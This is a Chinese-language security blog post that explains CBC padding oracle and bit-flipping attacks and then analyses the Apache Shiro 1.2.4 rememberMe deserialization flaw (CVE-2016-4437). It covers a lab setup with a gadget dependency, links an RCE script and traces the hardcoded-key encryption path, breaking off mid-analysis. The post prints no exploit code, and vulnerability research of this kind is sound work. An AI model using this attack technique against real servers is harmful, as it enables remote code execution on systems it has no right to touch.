<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-center-circle.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon1.ico?v=6.3.0">


  <link rel="mask-icon" href="/images/favicon1.ico?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="keywords" content="漏洞分析,Java">
<meta property="og:type" content="article">
<meta property="og:title" content="Shiro 反序列化漏洞分析">
<meta property="og:url" content="http://0day.design/2020/03/08/Shiro Padding Oracle Attack 反序列化/index.html">
<meta property="og:site_name" content="Passer6y&#39;s Blog">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://i.loli.net/2020/03/07/f5UJsNlhXrZcvn8.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/qjpLmrAhKxQdnlb.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/JlacVGnqZeI3Sty.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/s659b8FhlHRuqix.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/tPgIkSDaCsdwVn1.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/C4Geb3w2WPHAQXd.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/7HiNObjseCl94zW.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/b6fdK82s5WYpvqz.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/KJtiUeSjDydLH3a.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/LKbT9AjuN4lIoGn.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/gBnOAZ6HlepCmj4.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/AtzrgTCBJX2wHZn.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/Bx6IPz1hcFgVtvD.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/fVLsED7YiGTFJHp.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/K8ZW1xShFHAXd4M.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/lz7xb9tFRgyYWsU.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/pRaKo3Jr4kt9BvP.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/OmXryYACU9W2Pnh.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/BFuk1ejaoXyOfJT.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/376DLRayfkHNEvr.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/8xLMYvaT5cjsun6.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/5EsN1kp76OwaYnu.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/glkqJAuHLVInb1P.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/yFcJvlCeYtBmXbp.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/GZ49YHAQSd7ioBu.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/OCbaAIwflgFP452.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/nYdZpUwJ9WtRogc.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/FEYfb3ztTO6892r.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/zaL84qUgITr1pmD.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/qD1Rblso8JFk5gE.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/8eWULN2ctlARsnX.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/aTyQLrH1BnCvjol.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/BOKl8EhoVzX75Dj.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/07/EiVnb4wKWfRt9ZJ.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/B1vORsbDQIf6PFq.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/87TFURzvVHtYOeq.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/9jbleZPJzkhadoR.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/G5tTdaBLfbsruYj.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/Mb1BkSRdrjmqTE2.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/xc8CH3kDXUog2nW.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/Rn74fdE3lviKpO9.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/gavj1AIZuzpHbhx.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/tsU1jzcnL76EokT.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/EiaT4phwcOBbCPt.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/08/S9Mjhr28QHYEu1f.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/09/poL4qfkhUxnFrBV.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/09/7OGrJ1jAdaNl9hm.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/09/uUbnDyr9w74SjYE.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/09/Bub7daNSGAPwxe1.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/09/wBSoNMXT1W4iRyd.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/09/Xouavkr5TKR62gy.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/09/qIze16hpPJ9nAYD.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/09/eSDFNz5iod7fBPX.jpg">
<meta property="og:image" content="https://i.loli.net/2020/03/09/PF9fCX7my8A2n3p.jpg">
<meta property="og:updated_time" content="2020-03-09T08:49:28.166Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Shiro 反序列化漏洞分析">
<meta name="twitter:image" content="https://i.loli.net/2020/03/07/f5UJsNlhXrZcvn8.jpg">



  <link rel="alternate" href="/atom.xml" title="Passer6y's Blog" type="application/atom+xml" />




  <link rel="canonical" href="http://0day.design/2020/03/08/Shiro Padding Oracle Attack 反序列化/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Shiro 反序列化漏洞分析 | Passer6y's Blog</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?14e9c0326e763de8b0a61711cc963a58";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Passer6y's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-ctf">
    <a href="/categories/CTF/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />CTF</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-web">
    <a href="/categories/Web/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-jsfiddle"></i> <br />Web</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-code">
    <a href="/categories/Code/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-code"></i> <br />Code</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-internet">
    <a href="/categories/Internet/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-wifi"></i> <br />内网渗透</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-others">
    <a href="/categories/Others/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-eye"></i> <br />Others</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-folder-open"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/About/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />Search</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  
    <div class="reading-progress-bar"></div>
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://0day.design/2020/03/08/Shiro Padding Oracle Attack 反序列化/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Passer6y">
      <meta itemprop="description" content="A salty fish">
      <meta itemprop="image" content="/images/21.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Passer6y's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Shiro 反序列化漏洞分析
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2020-03-08 19:02:00" itemprop="dateCreated datePublished" datetime="2020-03-08T19:02:00+08:00">2020-03-08</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2020-03-09 16:49:28" itemprop="dateModified" datetime="2020-03-09T16:49:28+08:00">2020-03-09</time>
              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/Web/" itemprop="url" rel="index"><span itemprop="name">Web</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2020/03/08/Shiro Padding Oracle Attack 反序列化/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2020/03/08/Shiro Padding Oracle Attack 反序列化/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<a id="more"></a>
<h2 id="基础"><a href="#基础" class="headerlink" title="基础"></a>基础</h2><p>参考<a href="https://ctf-wiki.github.io/ctf-wiki/crypto/blockcipher/mode/cbc-zh/" target="_blank" rel="noopener">ctfwiki中对CBC模式的介绍</a>，先看一下CBC模式下的加解密模式图：<br><img src="https://i.loli.net/2020/03/07/f5UJsNlhXrZcvn8.jpg" alt=""></p>
<p><img src="https://i.loli.net/2020/03/07/qjpLmrAhKxQdnlb.jpg" alt=""></p>
<p>简单概括一下，加密过程初始化向量IV和第一组明文进行异或，然后经过加密算法得到第一组密文，并拿它作为下一分组加密的IV向量，迭代下去。解密过程反之，先解密再和IV向量异或得到明文plaintext。这里的IV参数是一个随机值(长度和分组长度等长)，为了保证多次加密相同数据生成的密文不同而设计的。</p>
<p>为了方便后文描述，将IV和Planttext异或后的值称为中间intermediary Value。</p>
<p><strong>分组的填充padding</strong><br>分组的长度，不同加密算法的长度如下图所示：<br><img src="https://i.loli.net/2020/03/07/JlacVGnqZeI3Sty.jpg" alt=""></p>
<p>分组密码(block cipher)需要保证总长度是分组长度的整数倍，但一般在最后一组会出现长度不够分组长度的情况，这时候就需要使用padding填充，填充的规则是在最后填充一个固定的值，值的大小为填充的字节总数，即需最后还差2个字节，则填充两个0x02。下边8个字节的填充范围为<code>0x01-0x08</code>。</p>
<p><img src="https://i.loli.net/2020/03/07/s659b8FhlHRuqix.jpg" alt=""></p>
<blockquote>
<p>这种Padding原则遵循的是常见的PKCS#5标准。<a href="http://www.di-mgt.com.au/cryptopad.html#PKCS5" target="_blank" rel="noopener">http://www.di-mgt.com.au/cryptopad.html#PKCS5</a></p>
</blockquote>
<h3 id="Padding-Oracle-Attack"><a href="#Padding-Oracle-Attack" class="headerlink" title="Padding Oracle Attack"></a>Padding Oracle Attack</h3><h4 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h4><ol>
<li>攻击者知道密文和初始向量IV</li>
<li>padding错误和padding正确服务器可返回不一样的状态</li>
</ol>
<p><strong>攻击效果</strong><br>正常CBC解密需要知道IV、Key、密文，而通过Padding Oracle漏洞，只用知道IV、密文即可获得明文。</p>
<h4 id="demo"><a href="#demo" class="headerlink" title="demo"></a>demo</h4><p>以这样一个程序为例：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://sampleapp/home.jsp?UID=0000000000000000EFC2807233F9D7C097116BB33E813C5E</span><br></pre></td></tr></table></figure></p>
<p>前16个字母(8字节)<code>0000000000000000</code>为IV，后32字母(16字节)为密文：<br><img src="https://i.loli.net/2020/03/07/tPgIkSDaCsdwVn1.jpg" alt=""></p>
<p><strong>padding 0x01</strong><br>通常程序校验padding是否正确是通过检查末尾的那个字节的值，我们可以通过修改IV的值使得其与中间量intermediary Value异或得到的结果(plaintext)最后一个字节(填充位)为0x01。</p>
<p>实现这样一个穷举的过程，需要改变IV的最后一个字节(最多255次)，且需要服务端将判断padding校验的结果返回给客户端(类似于布尔注入的逻辑)。比如在web应用中，padding正确(解密的内容不正确)返回200，padding错误(解密内容错误)返回500。</p>
<p><img src="https://i.loli.net/2020/03/07/C4Geb3w2WPHAQXd.jpg" alt=""></p>
<p>至此通过上述步骤，我们可以通过<code>IV</code>(fuzz出的IV)和<code>0x01</code>异或得到intermediary Value中间值。</p>
<p>在<em>单个分组</em>的情况下，其实我们拿着intermediary Value和<em>初始向量IV</em>异或，即可拿到最后明文的最后一个字节：<br><img src="https://i.loli.net/2020/03/07/7HiNObjseCl94zW.jpg" alt="-w824"></p>
<p><strong>padding 0x02</strong><br>此时，通过修改IV第八个字节的值使得最后一个padding位变成0x02(上图中0x67^0x02=0×64)，再fuzz IV第七个字节，使得服务端解出plaintext其填充位为0x02，以此类推。</p>
<p>总的来说，其实攻击的本质都是为了得到中间临时变量intermediary value，通过其和初始IV计算出明文。</p>
<p><strong>多分组密文情况</strong><br>上面说到的Padding Oracle Attack是以单个分组进行的，如果密文有多个分组，其最大的区别在于这一分组加密的初始IV向量为上次组加密的结果Ciphertext。</p>
<p>在多分组密文中，由于密文和IV已知且可控，先拿第一组padding的方式爆破IV推算intermediary value，然后根据原始IV计算出明文，也可以通过修改原始IV控制密文结果；再拿第一二组，用padding的方式爆破intermediary value，此时的初始IV为第一组的密文，以此类推。</p>
<h4 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h4><p>漏洞的关键点在于攻击者能够判断其padding的结果，在使用CBC模式的分组加密算法需要注意这一点，比如让服务端加上异常处理等等。</p>
<blockquote>
<p>实验代码：<a href="media/15832217572390/Demo.py">Demo</a></p>
</blockquote>
<h3 id="CBC字节反转"><a href="#CBC字节反转" class="headerlink" title="CBC字节反转"></a>CBC字节反转</h3><p>在乌云知识库里有一篇文章的例子说的比较清晰：<a href="http://drops.xmd5.com/static/drops/tips-7828.html" target="_blank" rel="noopener">CBC字节翻转攻击-101Approach</a>，<br>再来参考<a href="https://ctf-wiki.github.io/ctf-wiki/crypto/blockcipher/mode/cbc-zh/" target="_blank" rel="noopener">ctfwiki中对CBC模式的介绍</a>：<br><img src="https://i.loli.net/2020/03/07/b6fdK82s5WYpvqz.jpg" alt="-w852"><br>简单来说，通过构造第n的密文块为<code>C(n) xor P(n+1) xor A</code>，使得第n+1密文块为A(个人觉得CTFWiki这里写错了)，为什么呢？</p>
<p><code>C(n) xor P(n+1)</code>的结果实际上就是第n+1组的<code>intermediary value</code>，在解密时让<code>intermediary value</code>自己异或自己得全0，然后再异或A得A。如下图所示：</p>
<p><img src="https://i.loli.net/2020/03/07/KJtiUeSjDydLH3a.jpg" alt=""></p>
<p>简而言之，通过损坏密文字节来改变明文字节，攻击条件为知道一组明文和密文。</p>
<h2 id="CVE-2016-4437-Shiro-反序列化-Shiro-lt-1-2-4"><a href="#CVE-2016-4437-Shiro-反序列化-Shiro-lt-1-2-4" class="headerlink" title="CVE-2016-4437: Shiro 反序列化(Shiro &lt;= 1.2.4)"></a>CVE-2016-4437: Shiro 反序列化(Shiro &lt;= 1.2.4)</h2><p>Apache Shiro是一个开源安全框架，提供身份验证、授权、密码学和会话管理。在Apache Shiro &lt;= 1.2.4版本中存在反序列化漏洞。</p>
<h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><p>去github上下一个<a href="https://github.com/apache/shiro/archive/shiro-root-1.2.4.zip" target="_blank" rel="noopener">shiro 1.2.4</a>:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/apache/shiro.git</span><br><span class="line">cd shiro</span><br><span class="line">git checkout shiro-root-1.2.4</span><br></pre></td></tr></table></figure></p>
<p>然后修改shiro/samples/web/pom.xml<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--  需要设置编译的版本 --&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">properties</span>&gt;</span></span><br><span class="line">       <span class="tag">&lt;<span class="name">maven.compiler.source</span>&gt;</span>1.8<span class="tag">&lt;/<span class="name">maven.compiler.source</span>&gt;</span></span><br><span class="line">       <span class="tag">&lt;<span class="name">maven.compiler.target</span>&gt;</span>1.8<span class="tag">&lt;/<span class="name">maven.compiler.target</span>&gt;</span></span><br><span class="line">   <span class="tag">&lt;/<span class="name">properties</span>&gt;</span></span><br><span class="line"></span><br><span class="line">   <span class="tag">&lt;<span class="name">dependencies</span>&gt;</span></span><br><span class="line">       <span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">           <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>javax.servlet<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">           <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>jstl<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">           <span class="comment">&lt;!--  这里需要将jstl设置为1.2 --&gt;</span></span><br><span class="line">           <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.2<span class="tag">&lt;/<span class="name">version</span>&gt;</span> </span><br><span class="line">           <span class="tag">&lt;<span class="name">scope</span>&gt;</span>runtime<span class="tag">&lt;/<span class="name">scope</span>&gt;</span></span><br><span class="line">       <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line">       </span><br><span class="line">    ·   <span class="comment">&lt;!--加一个gadget--&gt;</span></span><br><span class="line">       <span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">           <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.apache.commons<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">           <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-collections4<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">           <span class="tag">&lt;<span class="name">version</span>&gt;</span>4.0<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line">       <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependencies</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>编译：<code>sudo mvn package</code></p>
<p>爆了这样的错：<br><img src="https://i.loli.net/2020/03/07/LKbT9AjuN4lIoGn.jpg" alt="-w759"><br>先得去搞个jdk1.6来，mac下弃用了，参考这篇文章：<a href="https://blog.csdn.net/q258523454/article/details/84029886，去这里下[mac的jdk1.6][6]。" target="_blank" rel="noopener">https://blog.csdn.net/q258523454/article/details/84029886，去这里下[mac的jdk1.6][6]。</a><br><img src="https://i.loli.net/2020/03/07/gBnOAZ6HlepCmj4.jpg" alt="-w518"></p>
<p>然后切换到root创一个文件：/var/root/.m2/toolchains.xml<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?</span>xml version=<span class="string">"1.0"</span> encoding=<span class="string">"UTF-8"</span><span class="meta">?&gt;</span></span></span><br><span class="line"><span class="tag">&lt;<span class="name">toolchains</span> <span class="attr">xmlns</span>=<span class="string">"http://maven.apache.org/TOOLCHAINS/1.1.0"</span> <span class="attr">xmlns:xsi</span>=<span class="string">"http://www.w3.org/2001/XMLSchema-instance"</span></span></span><br><span class="line"><span class="tag">  <span class="attr">xsi:schemaLocation</span>=<span class="string">"http://maven.apache.org/TOOLCHAINS/1.1.0 http://maven.apache.org/xsd/toolchains-1.1.0.xsd"</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--插入下面代码--&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">toolchain</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">type</span>&gt;</span>jdk<span class="tag">&lt;/<span class="name">type</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">provides</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.6<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">vendor</span>&gt;</span>sun<span class="tag">&lt;/<span class="name">vendor</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">provides</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">configuration</span>&gt;</span></span><br><span class="line">        <span class="comment">&lt;!--这里是你安装jdk的文件目录--&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">jdkHome</span>&gt;</span>/Library/Java/JavaVirtualMachines/1.6.0.jdk/<span class="tag">&lt;/<span class="name">jdkHome</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">configuration</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">toolchain</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">toolchains</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>再编译就能成功了：<br><img src="https://i.loli.net/2020/03/07/AtzrgTCBJX2wHZn.jpg" alt="-w375"></p>
<p>将这个war包放到tomcat的webapp目录下，然后访问<code>http://127.0.0.1:8080/shiro/</code>会自动解压：<br><a href="media/15832217572390/samples-web-1.2.4.war">samples-web-1.2.4</a><br><img src="https://i.loli.net/2020/03/07/Bx6IPz1hcFgVtvD.jpg" alt="-w684"></p>
<p>也可以把它导到idea里打包，接着配置idea，这里踩了坑EDU版本是没有tomcat server的，一定要用旗舰版：<br><img src="https://i.loli.net/2020/03/07/fVLsED7YiGTFJHp.jpg" alt="-w1117"></p>
<p><img src="https://i.loli.net/2020/03/07/K8ZW1xShFHAXd4M.jpg" alt="-w1078"></p>
<p><img src="https://i.loli.net/2020/03/07/lz7xb9tFRgyYWsU.jpg" alt="-w870"></p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>EXP打ysoserial的二链：<a href="media/15832217572390/shiro1.2.4RCE.py">shiro1.2.4RCE</a><br><img src="https://i.loli.net/2020/03/07/pRaKo3Jr4kt9BvP.jpg" alt="-w1167"></p>
<h3 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析"></a>代码分析</h3><h4 id="加密"><a href="#加密" class="headerlink" title="加密"></a>加密</h4><p>先下个断点：org.apache.shiro.mgt.AbstractRememberMeManager#onSuccessfulLogin，去login.jsp登录root    secret，选中Remember Me。<br><img src="https://i.loli.net/2020/03/07/OmXryYACU9W2Pnh.jpg" alt="-w1235"><br>在<code>forgetIdentity</code>函数中处理了request和response请求，在response中处理remember me的cookie。<br><img src="https://i.loli.net/2020/03/07/BFuk1ejaoXyOfJT.jpg" alt="-w1315"><br>再跟进<code>rememberIdentity</code>函数：<br><img src="https://i.loli.net/2020/03/07/376DLRayfkHNEvr.jpg" alt="-w1234"><br>调用<code>convertPrincipalsToBytes</code>将账户信息传入，先是进行序列化，再来一个加密：<br><img src="https://i.loli.net/2020/03/07/8xLMYvaT5cjsun6.jpg" alt="-w1107"><br>跟进<code>encrypt</code>函数：<br><img src="https://i.loli.net/2020/03/07/5EsN1kp76OwaYnu.jpg" alt="-w1237"><br><code>getCipherService</code>先获取了一下加密服务的配置信息，包括加密模式，填充方式，加密类型等等：<br><img src="https://i.loli.net/2020/03/07/glkqJAuHLVInb1P.jpg" alt="-w830"><br><code>cipherService.encrypt</code><br><img src="https://i.loli.net/2020/03/07/yFcJvlCeYtBmXbp.jpg" alt="-w1077"><br>其中秘钥在AbstractRememberMeManager.java中设置的一个定值：<br><img src="https://i.loli.net/2020/03/07/GZ49YHAQSd7ioBu.jpg" alt="-w1220"><br>通过构造方法设置的：<br><img src="https://i.loli.net/2020/03/07/OCbaAIwflgFP452.jpg" alt="-w795"><br><img 